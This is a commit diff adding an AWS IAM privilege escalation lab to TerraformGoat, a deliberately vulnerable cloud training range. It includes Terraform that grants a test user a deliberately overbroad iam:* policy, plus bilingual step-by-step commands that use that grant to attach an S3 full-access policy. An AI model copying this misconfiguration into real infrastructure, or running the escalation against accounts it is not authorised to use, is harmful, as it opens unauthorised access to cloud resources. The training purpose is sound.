Merge pull request #30 from teamssix/main

feat: add aws iam privilege escalation scenario

Author: teamssix

Dockerfile

@@ -7,6 +7,8 @@ RUN apt-get update -y && \
     apt-get install -qy vim && \
     apt-get install -qy lsb-release && \
     apt-get install -qy software-properties-common && \
+    apt-get install -y -qq less && \
+    apt-get install -y -qq groff && \
     curl -fsSL https://apt.releases.hashicorp.com/gpg | apt-key add - 2>/dev/null && \
     apt-add-repository "deb [arch=amd64] https://apt.releases.hashicorp.com $(lsb_release -cs) main" && \
     apt-get update && \

README.md

@@ -1,4 +1,4 @@
-# :star2: TerraformGoat
+# TerraformGoat
 
 [![License: Apache-2.0](https://img.shields.io/badge/license-Apache--2.0-blue)](https://github.com/HuoCorp/TerraformGoat/blob/main/LICENSE) [![GitHub release](https://img.shields.io/github/release/HuoCorp/TerraformGoat.svg)](https://github.com/HuoCorp/TerraformGoat/releases) [![Github Stars](https://img.shields.io/github/stars/HuoCorp/TerraformGoat)](https://github.com/HuoCorp/TerraformGoat/stargazers) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/HuoCorp/TerraformGoat/pulls) [![tweet](https://img.shields.io/twitter/url?url=https://github.com/HuoCorp/TerraformGoat)](https://twitter.com/intent/tweet/?text=TerraformGoat%20is%20HuoCorp%20research%20lab's%20%22Vulnerable%20by%20Design%22%20multi%20cloud%20deployment%20tool.%20Check%20it%20out%20https%3A%2F%2Fgithub.com%2FHuoCorp%2FTerraformGoat%0A%23TerraformGoat%20%23Terraform%20%23Cloud%20%23Security%20%23cloudsecurity)
 
@@ -33,14 +33,15 @@ Currently supported cloud vendors include Alibaba Cloud, Tencent Cloud, Huawei C
 |  19  |  Amazon  Web Services  |      Object Storage       | [Unrestricted File Upload](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/object_storage_service/unrestricted_file_upload) |
 |  20  |  Amazon  Web Services  | Elastic Computing Service | [EC2 SSRF](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/elastic_computing_service/ec2_ssrf) |
 |  21  |  Amazon  Web Services  | Elastic Computing Service | [Console Takeover](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/elastic_computing_service/console_takeover) |
-|  22  | Google  Cloud Platform |      Object Storage       | [Object ACL Writable](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/object_acl_writable) |
-|  23  | Google  Cloud Platform |      Object Storage       | [Bucket ACL Writable](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_acl_writable) |
-|  24  | Google  Cloud Platform |      Object Storage       | [Bucket Object Traversal](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_object_traversal) |
-|  25  | Google  Cloud Platform |      Object Storage       | [Unrestricted File Upload](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/unrestricted_file_upload) |
-|  26  |  Google  Cloud Platform  | Elastic Computing Service | [VM Command Execution](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/elastic_computing_service/vm_command_execution) |
-|  27  |    Microsoft  Azure    |      Object Storage       | [Blob  Public Access](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/blob_public_access/) |
-|  28  |    Microsoft  Azure    |      Object Storage       | [Container Blob Traversal](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/container_blob_traversal/) |
-|  29  |  Microsoft  Azure  | Elastic Computing Service | [VM Command Execution](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/elastic_computing_service/vm_command_execution) |
+|  22  |  Amazon  Web Services  | Identity and Access Management | [IAM Privilege Escalation](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/identity_and_access_management/privilege_escalation) |
+|  23  | Google  Cloud Platform |      Object Storage       | [Object ACL Writable](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/object_acl_writable) |
+|  24  | Google  Cloud Platform |      Object Storage       | [Bucket ACL Writable](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_acl_writable) |
+|  25  | Google  Cloud Platform |      Object Storage       | [Bucket Object Traversal](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_object_traversal) |
+|  26  | Google  Cloud Platform |      Object Storage       | [Unrestricted File Upload](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/unrestricted_file_upload) |
+|  27  |  Google  Cloud Platform  | Elastic Computing Service | [VM Command Execution](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/elastic_computing_service/vm_command_execution) |
+|  28  |    Microsoft  Azure    |      Object Storage       | [Blob  Public Access](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/blob_public_access/) |
+|  29  |    Microsoft  Azure    |      Object Storage       | [Container Blob Traversal](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/container_blob_traversal/) |
+|  30  |  Microsoft  Azure  | Elastic Computing Service | [VM Command Execution](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/elastic_computing_service/vm_command_execution) |
 
 ## :dizzy: Install
 

README_CN.md

@@ -1,4 +1,4 @@
-# :star2: TerraformGoat
+# TerraformGoat
 
 [![License: Apache-2.0](https://img.shields.io/badge/license-Apache--2.0-blue)](https://github.com/HuoCorp/TerraformGoat/blob/main/LICENSE) [![GitHub release](https://img.shields.io/github/release/HuoCorp/TerraformGoat.svg)](https://github.com/HuoCorp/TerraformGoat/releases) [![Github Stars](https://img.shields.io/github/stars/HuoCorp/TerraformGoat)](https://github.com/HuoCorp/TerraformGoat/stargazers) [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/HuoCorp/TerraformGoat/pulls) [![tweet](https://img.shields.io/twitter/url?url=https://github.com/HuoCorp/TerraformGoat)](https://twitter.com/intent/tweet/?text=TerraformGoat%20is%20HuoCorp%20research%20lab's%20%22Vulnerable%20by%20Design%22%20multi%20cloud%20deployment%20tool.%20Check%20it%20out%20https%3A%2F%2Fgithub.com%2FHuoCorp%2FTerraformGoat%0A%23TerraformGoat%20%23Terraform%20%23Cloud%20%23Security%20%23cloudsecurity)
 
@@ -32,14 +32,15 @@ Cloud Platform、Microsoft Azure 六个云厂商的云场景漏洞搭建。
 |  19  |  Amazon  Web Services  |   对象存储   | [特殊的 Bucket 策略](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/object_storage_service/special_bucket_policy) |
 |  20  |  Amazon  Web Services  | 弹性计算服务 | [EC2 SSRF 漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/elastic_computing_service/ec2_ssrf) |
 |  21  |  Amazon  Web Services  | 弹性计算服务 | [控制台接管漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/elastic_computing_service/console_takeover) |
-|  22  | Google  Cloud Platform |   对象存储   | [任意文件上传](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/unrestricted_file_upload) |
-|  23  | Google  Cloud Platform |   对象存储   | [Object ACL 可写](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/object_acl_writable) |
-|  24  | Google  Cloud Platform |   对象存储   | [Bucket ACL 可写](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_acl_writable) |
-|  25  | Google  Cloud Platform |   对象存储   | [Bucket 对象遍历](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_object_traversal) |
-|  26  |  Google  Cloud Platform  | 弹性计算服务 | [VM 命令执行漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/elastic_computing_service/vm_command_execution) |
-|  27  |    Microsoft  Azure    |   对象存储   | [Blob 公开访问](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/blob_public_access/) |
-|  28  |    Microsoft  Azure    |   对象存储   | [Container Blob 遍历](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/container_blob_traversal/) |
-|  29  |  Microsoft  Azure  | 弹性计算服务 | [VM 命令执行漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/elastic_computing_service/vm_command_execution) |
+|  22  |  Amazon  Web Services  | 身份和访问管理 | [IAM 提权环境](https://github.com/HuoCorp/TerraformGoat/tree/main/aws/identity_and_access_management/privilege_escalation) |
+|  23  | Google  Cloud Platform |   对象存储   | [任意文件上传](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/unrestricted_file_upload) |
+|  24  | Google  Cloud Platform |   对象存储   | [Object ACL 可写](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/object_acl_writable) |
+|  25  | Google  Cloud Platform |   对象存储   | [Bucket ACL 可写](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_acl_writable) |
+|  26  | Google  Cloud Platform |   对象存储   | [Bucket 对象遍历](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/object_storage_service/bucket_object_traversal) |
+|  27  |  Google  Cloud Platform  | 弹性计算服务 | [VM 命令执行漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/gcp/elastic_computing_service/vm_command_execution) |
+|  28  |    Microsoft  Azure    |   对象存储   | [Blob 公开访问](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/blob_public_access/) |
+|  29  |    Microsoft  Azure    |   对象存储   | [Container Blob 遍历](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/object_storage_service/container_blob_traversal/) |
+|  30  |  Microsoft  Azure  | 弹性计算服务 | [VM 命令执行漏洞环境](https://github.com/HuoCorp/TerraformGoat/tree/main/azure/elastic_computing_service/vm_command_execution) |
 
 ## :dizzy: 安装
 

aws/identity_and_access_management/privilege_escalation/README.md

@@ -0,0 +1,116 @@
+# AWS IAM Privilege Escalation Vulnerable Environment
+
+English | [中文](./README_CN.md)
+
+## Description
+
+This is a scenario used to build the AWS IAM privilege escalation vulnerability environment.
+
+After building the environment with Terraform, The IAM privilege elevation vulnerability can be used to access services that you would not otherwise have permission to access.
+
+## Deployment Environment
+
+Execute the following command in the container
+
+```shell
+cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation
+```
+
+Configure AWS Access Credentials
+
+```shell
+aws configure
+```
+
+> You can see the access key in the AWS [Console --> Security Credentials]
+
+Deploy Vulnerable Environment
+
+```shell
+terraform init
+terraform apply
+```
+
+> When the terminal prompts `Enter a value:`, enter `yes`
+
+After building the scenario, use the following command to view the access_key_id and secret_access_key of the low privilege account.
+
+```shell
+apt-get install jq -y
+terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes'
+```
+
+![img](../../../images/1652690733.png)
+
+## Vulnerability Utilization
+
+First configure the access_key_id and secret_access_key of the low privilege account.
+
+```shell
+aws configure
+```
+
+After the configuration, here is an example of S3 service, try to run the following command, you can see the return message shows that access is denied.
+
+```shell
+aws s3 ls
+```
+
+![img](../../../images/1652690932.png)
+
+Get the privileges held by the current user.
+
+```shell
+aws iam get-user
+aws iam list-user-policies --user-name huoxian_terraform_test
+aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess
+```
+
+![img](../../../images/1652692179.png)
+
+You can see that the current user has all the privileges of IAM, which means that we can give S3 privileges to the current user, thus enabling the current user to access S3 service resources.
+
+Edit policy file
+
+```shell
+vim AmazonS3FullAccess.json
+```
+
+The contents of the policy file are as follows:
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Action": [
+                "s3:*",
+                "s3-object-lambda:*"
+            ],
+            "Resource": "*"
+        }
+    ]
+}
+```
+
+PUT policy file
+
+```shell
+aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json
+```
+
+Try again to get the S3 service resource, you can see that it has been obtained, which means that the policy file is in effect, so that the IAM privilege elevation is achieved.
+
+```shell
+aws s3 ls
+```
+
+![img](../../../images/1652692416.png)
+
+## Destroy the environment
+
+```shell
+aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess
+terraform destroy
+```

aws/identity_and_access_management/privilege_escalation/README_CN.md

@@ -0,0 +1,116 @@
+# AWS IAM 提权漏洞环境
+
+[English](./README.md) | 中文
+
+## 描述信息
+
+这是一个用于构建 AWS IAM 提权漏洞环境的靶场。
+
+使用 Terraform 构建环境后，用户可以通过 IAM 提权漏洞访问到原本没有权限访问的服务。
+
+## 环境搭建
+
+在容器中执行以下命令
+
+```shell
+cd /TerraformGoat/aws/identity_and_access_management/privilege_escalation
+```
+
+配置 AWS 访问凭证
+
+```shell
+aws configure
+```
+
+> 在 AWS 「控制台——》安全凭证」处可以设置并查看你的 `aws_access_key_id` 和 `aws_secret_access_key`
+
+部署靶场
+
+```shell
+terraform init
+terraform apply
+```
+
+> 在终端提示 `Enter a value:` 时，输入 `yes` 即可
+
+环境搭建完后，通过以下命令查看低权限账号的 access_key_id 和 secret_access_key
+
+```shell
+apt-get install jq -y
+terraform state pull | jq '.resources[] | select(.type == "aws_iam_access_key") | .instances[0].attributes'
+```
+
+![img](../../../images/1652690733.png)
+
+## 漏洞利用
+
+首先配置上低权限账号的 access_key_id 和 secret_access_key
+
+```shell
+aws configure
+```
+
+配置完后，这里以 S3 服务为例，尝试运行以下命令，发现访问被拒绝
+
+```shell
+aws s3 ls
+```
+
+![img](../../../images/1652690932.png)
+
+查看当前用户的权限
+
+```shell
+aws iam get-user
+aws iam list-user-policies --user-name huoxian_terraform_test
+aws iam get-user-policy --user-name huoxian_terraform_test --policy-name IAMFullAccess
+```
+
+![img](../../../images/1652692179.png)
+
+发现当前用户有 IAM 的所有权限，这也就意味着我们可以给当前用户赋予 S3 的权限，从而使当前用户拥有 S3 服务的权限。
+
+编辑策略文件
+
+```shell
+vim AmazonS3FullAccess.json
+```
+
+文件内容如下：
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Action": [
+                "s3:*",
+                "s3-object-lambda:*"
+            ],
+            "Resource": "*"
+        }
+    ]
+}
+```
+
+上传策略文件
+
+```shell
+aws iam put-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess --policy-document file://AmazonS3FullAccess.json
+```
+
+再次尝试获取 S3 服务内容，发现已经可以获取了，说明策略文件生效了，这样就实现了 IAM 提权。
+
+```shell
+aws s3 ls
+```
+
+![img](../../../images/1652692416.png)
+
+## 销毁环境
+
+```shell
+aws iam delete-user-policy --user-name huoxian_terraform_test --policy-name AmazonS3FullAccess
+terraform destroy
+```

aws/identity_and_access_management/privilege_escalation/main.tf

@@ -0,0 +1,46 @@
+provider "aws" {
+  region = "us-east-1"
+}
+
+resource "aws_iam_user" "huoxian_terraform_user" {
+  name = "huoxian_terraform_test"
+}
+
+resource "aws_iam_access_key" "huoxian_terraform_access_key" {
+  user       = aws_iam_user.huoxian_terraform_user.name
+  depends_on = [aws_iam_user.huoxian_terraform_user]
+}
+
+resource "aws_iam_user_policy" "huoxian_terraform_policy" {
+  name       = "IAMFullAccess"
+  user       = aws_iam_user.huoxian_terraform_user.name
+  depends_on = [aws_iam_user.huoxian_terraform_user]
+  policy     = <<EOF
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Action": [
+        "iam:*",
+        "organizations:DescribeAccount",
+        "organizations:DescribeOrganization",
+        "organizations:DescribeOrganizationalUnit",
+        "organizations:DescribePolicy",
+        "organizations:ListChildren",
+        "organizations:ListParents",
+        "organizations:ListPoliciesForTarget",
+        "organizations:ListRoots",
+        "organizations:ListPolicies",
+        "organizations:ListTargetsForPolicy"
+      ],
+      "Effect": "Allow",
+      "Resource": "*"
+    }
+  ]
+}
+EOF
+}
+
+data "template_file" "secret" {
+  template = aws_iam_access_key.huoxian_terraform_access_key.encrypted_secret
+}

aws/identity_and_access_management/privilege_escalation/versions.tf

@@ -0,0 +1,8 @@
+terraform {
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = "4.10.0"
+    }
+  }
+}